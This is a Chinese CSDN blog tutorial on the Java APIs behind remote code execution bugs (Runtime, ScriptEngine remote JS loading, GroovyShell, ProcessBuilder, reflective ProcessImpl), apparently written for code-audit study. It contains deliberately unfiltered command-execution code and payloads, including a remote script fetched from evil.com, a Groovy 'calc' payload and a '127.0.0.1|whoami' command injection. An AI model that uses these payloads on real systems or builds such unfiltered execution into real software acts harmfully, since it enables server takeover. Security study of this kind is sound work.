JavaSec 基础之 RCE

已于 2024-02-24 22:05:42 修改
阅读量268 收藏 3
点赞数 1
分类专栏: JavaSec 基础 文章标签: 安全 java
于 2024-02-24 22:05:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akdelt/article/details/136276619
版权

文章目录

java 五大常见 RCE API

Runtime

最基本的 RCE 利用

Runtime.getRuntime().exec(cmd)

getRuntime() 常用于执行本地命令,使用频率较高

LoadJs

public void jsEngine(String url) throws Exception {
    ScriptEngine engine = new ScriptEngineManager().getEngineByName("JavaScript");
    Bindings bindings = engine.getBindings(ScriptContext.ENGINE_SCOPE);
    String payload = String.format("load('%s')", url);
    engine.eval(payload, bindings);
}

通过加载远程js文件来执行代码,如果加载了恶意js则会造成任意命令执行远程恶意代码

假设公网上有一恶意 js 脚本,该脚本导入了 java 环境执行 java 命令,我们就可以远程包含这个文件执行其恶意代码

var a = mainOutput(); function mainOutput() { var x=java.lang.Runtime.getRuntime().exec("open -a Calculator");}

payload

url=http://evil.com/java/1.js

⚠️ 在Java 8之后移除了ScriptEngineManager的eval

groovy

Groovy是一种基于JVM(Java虚拟机)的敏捷开发语言,它结合了Python、Ruby和Smalltalk的许多强大的特性,Groovy 代码能够与 Java 代码很好地结合,也能用于扩展现有代码

GroovyShell可动态运行groovy语言,也可以用于命令执行,如果用户的输入不加以过滤会导致rce。

@GetMapping("/groovy")
    public String groovyExec(String cmd, Model model) {
        GroovyShell shell = new GroovyShell();
        try {
            shell.evaluate(cmd);
            model.addAttribute("results", "执行成功!!!");
        } catch (Exception e) {
            e.printStackTrace();
            model.addAttribute("results", e.toString());
        }
        return "basevul/rce/groovy";
    }

payload

http://127.0.0.1:8000/home/rce/groovy?cmd='calc'.execute()

ProcessBuilder

Process类是一个抽象类(所有的方法均是抽象的),封装了一个进程(即一个执行程序)。

Process 类提供了执行从进程输入、执行输出到进程、等待进程完成、检查进程的退出状态以及销毁(杀掉)进程的方法。

ProcessBuilder.start() 和 Runtime.exec 方法创建一个本机进程,并返回 Process 子类的一个实例,该实例可用来控制进程并获取相关信息。

创建的子进程没有自己的终端或控制台。它的所有标准 io(即 stdin,stdout,stderr)操作都将通过三个流 (getOutputStream(),getInputStream(),getErrorStream()) 重定向到父进程,通过流的形式进行读取。

//        String[] cmdList = {"sh", "-c", "ping -c 1 " + ip};
        String[] cmdList = {"cmd", "/c", "ping -n 1 " + ip};
        StringBuilder sb = new StringBuilder();
        String line;
        String results;

        // 利用指定的操作系统程序和参数构造一个进程生成器
        ProcessBuilder pb = new ProcessBuilder(cmdList);
        pb.redirectErrorStream(true);

        // 使用此进程生成器的属性启动一个新进程
        Process process = null;
        try {
            process = pb.start();
            // 取得命令结果的输出流
            InputStream fis = process.getInputStream();
            // 用一个读输出流类去读
            InputStreamReader isr = new InputStreamReader(fis, "GBK");
            // 用缓存器读行
            BufferedReader br = new BufferedReader(isr);
            //直到读完为止
            while ((line = br.readLine()) != null) {
                sb.append(line).append(System.lineSeparator());
            }
            results = sb.toString();
        } catch (IOException e) {
            e.printStackTrace();
            results = e.toString();

payload

?ip=127.0.0.1|whoami

ProcessImpl

ProcessImpl 是更为底层的实现,Runtime和ProcessBuilder执行命令实际上也是调用了ProcessImpl这个类

对于ProcessImpl类不能直接调用,但可以通过反射来间接调用ProcessImpl来达到执行命令的目的

该类非Public修饰,所以在不同包下只能通过反射的方式去调用执行。

public static String vul(String cmd) throws Exception {
    // 首先,使用 Class.forName 方法来获取 ProcessImpl 类的类对象
    Class clazz = Class.forName("java.lang.ProcessImpl");

    // 然后,使用 clazz.getDeclaredMethod 方法来获取 ProcessImpl 类的 start 方法
    Method method = clazz.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class);

    // 使用 method.setAccessible 方法将 start 方法设为可访问
    method.setAccessible(true);

    // 最后,使用 method.invoke 方法来调用 start 方法,并传入参数 cmd,执行命令
    Process process = (Process) method.invoke(null, new String[]{cmd}, null, null, null, false);
}

payload

cmd=whoami
她送的苦茶子
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【Java代码审计】RCE
大河之犬的博客
12-21 1399
命令注入(RCE)是指在某种开发需求中,需要引入对系统本地命令的支持来完成某些特定的功能。当未对可控输入的参数进行严格的过滤时,则有可能发生命令注入。攻击者可以使用命令注入来执行系统终端命令,直接接管服务器的控制权限。
java代码审计工具_Java代码审计汇总系列(六)——RCE
weixin_42315341的博客
02-16 1433
一、概述任意代码执行(Remote Code Execution)是危害最为严重的漏洞之一,挖掘难度也是相对高的,除了常见的文件上传漏洞,还有OS命令注入、表达式注入、模板注入、代码注入和第三方组件漏洞,下面依次讲解审计方法和技巧。二、分类挖掘技巧1、OS命令注入OS命令注入涉及执行系统命令,通过关键字定位执行命令的方法是否参数可控,常用的搜索关键字有:System|exec|passthru|...
java反序列化rce rmi jrmp jndi 原理
whatday的专栏
12-27 885
RMI攻击主要分3种目标:RMI Client、RMI Server、RMI Registry。使用远程Reference字节码进行攻击。从jdk8u121开始,RMI加入了反序列化白名单机制,JRMP的payload登上舞台,这里的payload指的是ysoserial修改后的JRMPClient。从jdk8u121开始,RMI远程Reference代码默认不信任,RMI远程Reference代码攻击方式开始失效。
Java代码审计之RCE(远程命令执行)
liguangyao213的博客
03-02 5959
Java代码审计系列课程(点我哦) 漏洞原理: RCE漏洞,可让攻击者直接向后台服务器远程注入操做系统命令或者代码,从而控制后台系统。 出现此类漏洞通常由于应用系统从设计上须要给用户提供指定的远程命令操做的接口。通常会给用户提供一个ping操做的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而若是设计者在完成该功能时,没有作严格的安全控制,则可能会致使攻击者经过该接口提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器 runti
java---rce
weixin_30781107的博客
01-06 224
http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/#jboss 转载于:https://www.cnblogs.com/SZLLQ2000/p/4986779.ht...
java rce漏洞原理_JXBrowser JavaScript-Java bridge 中的RCE漏洞
weixin_39789206的博客
02-27 182
文章难易度:★★★文章阅读点/知识点:JXBrowserJavaScript-Java bridge 中的RCE漏洞文章作者:WisFree文章来源:blog.portswigger.net【技术分享】JXBrowser JavaScript-Java bridge 中的RCE漏洞1.png (408.46 KB, 下载次数: 13)2016-12-12 15:42 上传前言我近期正在研究如何使用...
java rce漏洞原理_rce漏洞 远程代码执行 简介
weixin_42467634的博客
02-27 1791
1)什么是远程代码执行远程命令执行 英文名称:RCE (remote code execution),简称RCE漏洞,是指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。2)远程代码执行的特点远程代码执行是指攻击者可能会通过远调用的方式来攻击或控制计算...
java rce漏洞原理_fastjson<1.2.47 RCE 漏洞复现
weixin_39777488的博客
02-27 247
这两天爆出了 fastjson 的老洞,复现简单记录一下。首先使用 spark 搭建一个简易的利用 fastjson 解析 json 的 http server。package cn.hacktech.fastjsonserver;import com.alibaba.fastjson.JSON;import static spark.Spark.*;public class Main {publ...
Stakcery#JavaSec#利用TemplatesImpl执行字节码1
07-25
介绍之前首先还是要知道defineClass的利用方式,下面给出简单的代码public TouchFile() throws Exception {把它编译成字
Y4tacker#JavaSec#CommonsBeanutils1笔记1
07-25
CommonsBeanutils1笔记主要是有个比较好玩的地方在TemplatesImpl的getOutputProperties方法里面也调用了newTran
Java-Rce-Echo:Java RCE回显测试代码
03-19
Java RCE回显 支持的回显测试代码 Linux通用回显 Windows通用回显 春天回显 Tomcat通用回显(已在6.0.10 / 6.0.53 / 7.0.34 / 7.0.54 / 7.0.70 / 7.0.96 / 7.0.104 / 8.0.18 / 8.0.32 / 8.0.48 / 8.5.12测试/8.5.30/8.5.56/9.0.16/9.0.33,在7.0.10 / 7.0.22上失败) Weblogic(在10.3.6.0,12.1.3.0.0上测试) Websphere(在AppServer V8.5(8.5.5.18),AppServer V9.0(9.0.5.5)上测试) JBoss(Wildfly)(在8.0.0.Final,18.0.0.Final,21.0.0.Beta1上进行测试) 树脂(在pro-4.0.64,pro-4.0.57,
JavaSec1Project4:Java pt.1项目4
04-29
这个类是Java编程基础的重要组成部分,它代表了一个书籍订单系统的核心概念。在本项目中,我们将学习如何创建、操作和理解面向对象编程(OOP)中的类。 首先,让我们了解Java语言的基本概念。Java是一种广泛使用的...
JavaSec1Project2:Java pt.1项目2
04-29
计算机科学概论1项目2 该项目评估以下技能。 学生应该能够: 编写代码以执行简单的重复编写静态方法使用静态方法该项目需要以下技能。 学生应该已经知道如何: 声明并定义原始数据类型的标识符提示用户输入数据并...
JavaSec2.2Project1b:Java第2.2节项目1b
04-29
总结来说,"JavaSec2.2Project1b"项目涵盖了Java安全模型的理解和应用,加密技术的实践,用户认证与授权的实现,网络编程基础,以及安全的文件I/O操作。通过这个项目,你可以深化对Java安全特性的理解,并提升你的...
common-collections中Java反序列化漏洞导致的RCE原理分析
weixin_33797791的博客
03-08 448
隐形人真忙 · 2015/11/11 22:400x00 背景这几天在zone看到了有人提及了有关于common-collections包的RCE漏洞,并且http://zone.wooyun.org/content/23849给出了具体的原理。作为一个业余的安全研究人员,除了会利用之外,还可以探究一下背后的原理。0x01 原理Java反序列化导致的漏洞原理上和PHP反序列一样,也是由于用户的输入...
java rce漏洞原理_fastjson的RCE漏洞复现记录
weixin_42133753的博客
02-27 578
参考链接:0x01 漏洞复现 RMi 1. payload:{"@type":"java.lang.Class",br/>"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl""@type":"com.sun.rowset.JdbcRowSetImpl",br/>},"b":{"@type":"com.s...
代码审计入门之java-sec-code
MSB_WLAQ的博客
10-13 2490
1.介绍 对于学习JAVA代码审计的同学来说,java-sec-code是一个不可多得的学习靶场,根据作者的介绍每个漏洞类型代码默认存在安全漏洞(除非本身不存在漏洞),相关修复代码在注释里,具体可查看每个漏洞代码和注释。 2.安装 项目地址https://github.com/JoyChou93/java-sec-code/ java-sec-code是由java开发,使用的框架为springboot,下载到本地后直接使用IDEA导入项目。 选择maven工程选项。 导入项目..
Java-Sec-Code 环境搭建
MZa1213123的博客
03-16 9076
一、Java Sec Code 介绍 对于学习Java漏洞代码来说,Java Sec Code是一个非常强大且友好的项目。 该项目也可以叫做Java Vulnerability Code(Java漏洞代码)。 每个漏洞类型代码默认存在安全漏洞(除非本身不存在漏洞),相关修复代码在注释里。 具体可查看每个漏洞代码和注释。 下载地址:https://github.com/JoyChou93/java-sec-code 二、搭建环境 IDEA 由于在 windows 对代码进行审计,方便 debu
JavaSec 基础之 CC1 链
最新发布
akdelt的博客
03-11 419
调用了 checkSetValue。而且它是 TransformedMap 的父类。
step 3/6 : ADD ./target/ javasec-1.7 .jar app. jar lstat target/javasec-1.7.jar: no such file or directory
07-15
这个错误提示表明在当前目录下找不到名为 "target/javasec-1.7.jar" 的文件。可能是由于以下原因之一导致的问题: 1. 该文件不存在:请确保在当前目录下存在名为 "target/javasec-1.7.jar" 的文件。你可以使用命令行或文件浏览器来验证文件是否存在。 2. 文件路径错误:检查一下文件路径是否正确。确保文件路径中没有拼写错误或者目录结构发生了变化。 3. 编译错误:如果你是在构建项目后尝试添加该文件,那么可能是编译过程中出现了错误。请确保你的项目成功编译,并且生成了正确的目标文件。 请根据上述提示进行检查,并采取相应的措施来解决问题。如果问题仍然存在,请提供更多的细节,以便我能够更好地帮助你。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值